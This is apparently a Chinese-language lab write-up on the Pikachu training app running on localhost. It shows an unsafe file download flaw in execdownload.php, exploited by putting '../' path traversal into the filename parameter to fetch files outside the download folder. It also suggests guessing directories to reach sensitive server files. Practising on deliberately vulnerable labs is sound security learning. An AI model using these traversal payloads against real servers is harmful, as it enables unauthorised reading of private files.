是一个图片下载页面，随便下载一张图片，查看下载链接发现是

http://127.0.0.1:8001/vul/unsafedownload/execdownload.php?filename=kb.png

修改拼接 URL， 构造想要传的的路径来对其进行文件上传

http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename=1.php

发现提示文件不存在，因此我们需要构造路径上传

上传的文件的地址：
phpStudy_64\phpstudy_pro\WWW\1.txt

构造后的URL：
http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename=../../../../1.txt

访问构造后的 URL 会弹出迅雷提示我下载

因此我们可以确定存在 Unsafe file download 漏洞。可以进行 ../ 返回上一级，再进行猜目录等构造更复杂的下载路径来下载服务器中的敏感文件

http://127.0.0.1/pikachu-master/vul/unsafedownload/execdownload.php?filename=../down_nba.php

发现可以下载